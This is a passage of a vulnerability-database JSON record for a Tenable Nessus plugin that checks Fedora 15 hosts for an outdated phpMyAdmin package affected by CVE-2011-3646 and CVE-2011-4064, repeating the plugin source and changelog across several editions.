"a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "70c3468e152c9031eb974ad57af7a5d2", "key": "href"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fae755fe64732027b1326b597da0a3d4", "key": "description"}, {"hash": "cb7fb37fdca009fce8f61733a6ae5652", "key": "pluginID"}, {"hash": "41576782ddde1c74fb02088838f852a8", "key": "published"}, {"hash": "191a2e1cc5e0af4046ab3e3c31ab0719", "key": "references"}, {"hash": "4b9ea36fd83076a8422902145214c024", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=56798", "id": "FEDORA_2011-15469.NASL", "lastseen": "2018-09-01T23:59:33", "modified": "2015-10-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "56798", "published": "2011-11-14T00:00:00", "references": ["http://www.nessus.org/u?1e5fda7b", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php", "https://bugzilla.redhat.com/show_bug.cgi?id=746880"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15469.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56798);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 21:56:29 $\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e5fda7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.7-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "title": "Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 4, "lastseen": "2018-09-01T23:59:33"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "cvelist": ["CVE-2011-3646", "CVE-2011-4064"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display options\n\n - [display] Broken binary column when 'Show binary contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability, see PMASA-2011-15= (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter), see PMASA-2011-= 16 (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "b93b52311c58d7ed70bce7ca444bd9a14addb51375c79d2a7cf12bb608662117", "hashmap": [{"hash": "350b26b71cccd9ed3db5ac4fed2811be", "key": "title"}, {"hash": "de38caaccc231e6a74b77a602b35db95", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "591f977c3bdb4c331e82410b4a2aabed", "key": "sourceData"}, {"hash": "2d1ff01fca6c4e8332328f748feb905f", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "70c3468e152c9031eb974ad57af7a5d2", "key": "href"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fae755fe64732027b1326b597da0a3d4", "key": "description"}, {"hash": "cb7fb37fdca009fce8f61733a6ae5652", "key": "pluginID"}, {"hash": "41576782ddde1c74fb02088838f852a8", "key": "published"}, {"hash": "191a2e1cc5e0af4046ab3e3c31ab0719", "key": "references"}, {"hash": "4b9ea36fd83076a8422902145214c024", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=56798", "id": "FEDORA_2011-15469.NASL", "lastseen": "2018-08-30T19:51:32", "modified": "2015-10-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "56798", "published": "2011-11-14T00:00:00", "references": ["http://www.nessus.org/u?1e5fda7b", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php", "https://bugzilla.redhat.com/show_bug.cgi?id=746880"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15469.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56798);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 21:56:29 $\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e5fda7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.7-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "title": "Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:51:32"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "cvelist": ["CVE-2011-3646", "CVE-2011-4064"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg[", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-11-01T02:26:52", "references": [{"idList": ["FEDORA_2011-15460.NASL", "GENTOO_GLSA-201201-01.NASL", "PHPMYADMIN_PMASA_2011_16.NASL", "FEDORA_2011-15472.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310902585", "OPENVAS:864063", "OPENVAS:1361412562310801994", "OPENVAS:1361412562310863617", "OPENVAS:863617", "OPENVAS:1361412562310863619", "OPENVAS:1361412562310831480", "OPENVAS:863619", "OPENVAS:831480", "OPENVAS:1361412562310864063"], "type": "openvas"}, {"idList": ["SSV:23110"], "type": "seebug"}, {"idList": ["GLSA-201201-01"], "type": "gentoo"}, {"idList": ["CVE-2011-3646", "CVE-2011-4064"], "type": "cve"}, {"idList": ["PHPMYADMIN:PMASA-2011-15", "PHPMYADMIN:PMASA-2011-16"], "type": "phpmyadmin"}]}, "score": {"modified": "2019-11-01T02:26:52", "value": 6.3, "vector": "NONE"}}, "hash": "2b3d685583f2cc1066d0c4d579b992f568a8340200b2b3969fcb2c361528ed73", "hashmap": [{"hash": "350b26b71cccd9ed3db5ac4fed2811be", "key": "title"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "0a830f681ba1bf60f6ec45946dd6e918", "key": "description"}, {"hash": "940ea861ca17b410c27dae10f10b7adb", "key": "reporter"}, {"hash": "d129a93789026026d807df8616554284", "key": "sourceData"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "2d1ff01fca6c4e8332328f748feb905f", "key": "cvelist"}, {"hash": "18b737c37904700fbd5c98a4b1e5d2a8", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "bcea74882597792a43e7a4e593462abd", "key": "href"}, {"hash": "cb7fb37fdca009fce8f61733a6ae5652", "key": "pluginID"}, {"hash": "41576782ddde1c74fb02088838f852a8", "key": "published"}, {"hash": "4b9ea36fd83076a8422902145214c024", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/56798", "id": "FEDORA_2011-15469.NASL", "lastseen": "2019-11-01T02:26:52", "modified": "2019-11-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "56798", "published": "2011-11-14T00:00:00", "references": ["http://www.nessus.org/u?1e5fda7b", "https://www.phpmyadmin.net/security/PMASA-2011-16/", "https://www.phpmyadmin.net/security/PMASA-2011-15/", "https://bugzilla.redhat.com/show_bug.cgi?id=746880"], "reporter": "This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15469.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56798);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/08/02 13:32:34\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e5fda7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.7-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "title": "Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified"], "edition": 9, "lastseen": "2019-11-01T02:26:52"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "4b9ea36fd83076a8422902145214c024"}, {"key": "cvelist", "hash": "2d1ff01fca6c4e8332328f748feb905f"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "description", "hash": "0a830f681ba1bf60f6ec45946dd6e918"}, {"key": "href", "hash": "bcea74882597792a43e7a4e593462abd"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "cb7fb37fdca009fce8f61733a6ae5652"}, {"key": "published", "hash": "41576782ddde1c74fb02088838f852a8"}, {"key": "references", "hash": "18b737c37904700fbd5c98a4b1e5d2a8"}, {"key": "reporter", "hash": "940ea861ca17b410c27dae10f10b7adb"}, {"key": "sourceData", "hash": "d129a93789026026d807df8616554284"}, {"key": "title", "hash": "350b26b71cccd9ed3db5ac4fed2811be"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "c2309e23e93d6181810898beffc819b1924b8e568155a6909cbd8303a53ac5b6", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4064", "CVE-2011-3646"]}, {"type": "openvas", "idList": ["OPENVAS:863619", "OPENVAS:1361412562310864063", "OPENVAS:1361412562310863617", "OPENVAS:864063", "OPENVAS:863617", "OPENVAS:1361412562310863619", "OPENVAS:1361412562310831480", "OPENVAS:831480", "OPENVAS:1361412562310902585", "OPENVAS:1361412562310801994"]}, {"type": "nessus", "idList": ["FEDORA_2011-15460.NASL", "FEDORA_2011-15472.NASL", "PHPMYADMIN_PMASA_2011_16.NASL", "GENTOO_GLSA-201201-01.NASL"]}, {"type": "seebug", "idList": ["SSV:23110"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2011-16", "PHPMYADMIN:PMASA-2011-15"]}, {"type": "gentoo", "idList": ["GLSA-201201-01"]}], "modified": "2019-12-13T07:03:28"}, "score": {"value": 6.3, "vector": "NONE", "modified": "2019-12-13T07:03:28"}, "vulnersScore": 6.3}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15469.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56798);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/08/02 13:32:34\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 